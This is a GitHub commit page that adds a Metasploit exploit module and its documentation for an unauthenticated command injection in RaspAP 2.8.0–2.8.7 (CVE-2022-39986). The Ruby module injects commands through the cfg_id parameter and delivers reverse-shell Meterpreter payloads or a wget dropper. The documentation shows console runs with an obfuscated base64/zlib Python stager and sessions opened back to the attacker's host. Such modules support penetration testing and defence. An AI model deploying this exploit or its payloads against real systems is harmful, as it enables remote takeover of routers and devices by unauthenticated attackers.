Skip to content

Commit

Permalink
Land #18263, Add RaspAP Unauth Command Injection
Browse files Browse the repository at this point in the history 
This PR adds an unauthenticated command injection
module for the RaspAP webgui application.
  • Loading branch information
@jheysel-r7
jheysel-r7 committed Aug 15, 2023
2 parents 0203209 + 99e78a4 commit 6cf136e
Show file tree
Hide file tree
Showing 2 changed files with 211 additions and 0 deletions.
95 changes: 95 additions & 0 deletions documentation/modules/exploit/unix/http/raspap_rce.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,95 @@
## Vulnerable Application

RaspAP is feature-rich wireless router software that just works
on many popular Debian-based devices, including the Raspberry Pi.

A Command injection vulnerability in RaspAP versions 2.8.0 thru 2.8.7 allows
unauthenticated attackers to execute arbitrary commands via the cfg_id
parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.

This Metasploit exploit module targets a command injection vulnerability (CVE-2022-39986) in RaspAP's web-gui PHP project,
The vulnerability affects versions of `RaspAP` between `2.8.0` and `2.8.7`. By exploiting this flaw, an attacker can execute
arbitrary commands in the context of the user running RaspAP. This issue was discovered and reported by Ismael0x00.
Check [here](https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2) for the original writeup.

## Testing
For installing the vulnerable version follow the steps below,
1. Follow the manual installation steps given [here](https://docs.raspap.com/manual/)
2. After setting up the service, navigate to the `/var/www/html` directory
3. Do `git checkout 2.8.0` for switching to the vulnerable version

**Note: Project can also be installed inside a ubuntu/debian docker containers**

## Verification Steps

1. msfconsole
2. Do: `use exploit/unix/http/raspap_rce`
3. Do: `set RHOST [IP]`
4. Do: `set RPORT [PORT]`
5. Do: `check`

## Options

## Scenarios

### Debian 12, Unix Command Target
```
msf6 > use exploit/unix/http/raspap_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(unix/http/raspap_rce) > set rhosts 172.16.199.130
rhosts => 172.16.199.130
msf6 exploit(unix/http/raspap_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(unix/http/raspap_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Unix Command with echo exec\(__import__\(\'zlib\'\).decompress\(__import__\(\'base64\'\).b64decode\(__import__\(\'codecs\'\).getencoder\(\'utf-8\'\)\(\'eNo9UE1LxDAQPTe/IrckGMNmqZVdrCDiQUQEd28i0iajhqZpSLJaFf+7DVmcwwxv5s2bDzP6KSQcJzVA4t/W9LzvIjQ1jykcVOLJjIBep4BnbBwOnXsDKldsi6oUvhZfxbY0ixLomh/x7uH67mW3f7y5umeZJ9TkHKhEKZHnayEbITcbIQmvF2OZ0gfoBlTBrMCnrJ2Hi2gBPD1jyLZlJ3FwvlMDJZe3hEcRQH3QReBp9Yx0e8SWoc93YwFbcFSzC7vI6ZP/6mlJMwQzKJrPFhrUNPoAMdLyAdE3dU5qyEz+QyLZxl+G/gDVz18D\'\)\[0\]\)\)\) | exec $(which python || which python3 || which python2) -
[*] Sending stage (24772 bytes) to 172.16.199.130
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.130:48494) at 2023-08-14 20:38:21 -0400
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : debian
OS : Linux 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-2 (2023-07-27)
Architecture : x64
Meterpreter : python/linux
meterpreter >
```

### Debian 11, Linux Dropper Target
```
msf6 > use exploit/unix/http/raspap_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(unix/http/raspap_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(unix/http/raspap_rce) > set lhost 172.17.0.1
lhost => 172.17.0.1
msf6 exploit(unix/http/raspap_rce) > set target 1
target => 1
msf6 exploit(unix/http/raspap_rce) > run
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Linux Dropper
[*] Using URL: http://172.17.0.1:8080/cH0NvADRgGYZoL
[*] Client 172.17.0.2 (Wget/1.21) requested /cH0NvADRgGYZoL
[*] Sending payload to 172.17.0.2 (Wget/1.21)
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:48940) at 2023-08-10 00:37:27 +0200
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Debian 11.6 (Linux 6.4.7-hardened1-2-hardened)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
116 changes: 116 additions & 0 deletions modules/exploits/unix/http/raspap_rce.rb
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,116 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'RaspAP Unauthenticated Command Injection',
'Description' => %q{
RaspAP is feature-rich wireless router software that just works
on many popular Debian-based devices, including the Raspberry Pi.
A Command Injection vulnerability in RaspAP versions 2.8.0 thru 2.8.7 allows
unauthenticated attackers to execute arbitrary commands in the context of the user running RaspAP via the cfg_id
parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.
Successfully tested against RaspAP 2.8.0 and 2.8.7.
},
'License' => MSF_LICENSE,
'Author' => [
'Ege BALCI <egebalci[at]pm.me>', # msf module
'Ismael0x00', # original PoC, analysis
],
'References' => [
['CVE', '2022-39986'],
['URL', 'https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2'],
['URL', 'https://github.com/advisories/GHSA-7c28-wg7r-pg6f']
],
'Platform' => ['unix', 'linux'],
'Privileged' => false,
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'CmdStagerFlavor' => :wget,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
}
}
]
],
'DisclosureDate' => '2023-07-31',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => []
}
)
)
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'The URI of the RaspAP Web GUI', '/'])
]
)
end

def check
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'ajax', 'openvpn', 'del_ovpncfg.php'),
'method' => 'POST'
)
return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?

if res.code == 200
return CheckCode::Appears
end

CheckCode::Safe
end

def execute_command(cmd, _opts = {})
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'ajax', 'openvpn', 'del_ovpncfg.php'),
'method' => 'POST',
'vars_post' => {
'cfg_id' => ";#{cmd};#"
}
)
end

def exploit
case target['Type']
when :unix_cmd
print_status("Executing #{target.name} with #{payload.encoded}")
execute_command(payload.encoded)
when :linux_dropper
print_status("Executing #{target.name}")
execute_cmdstager
end
end
end

0 comments on commit 6cf136e

Please sign in to comment.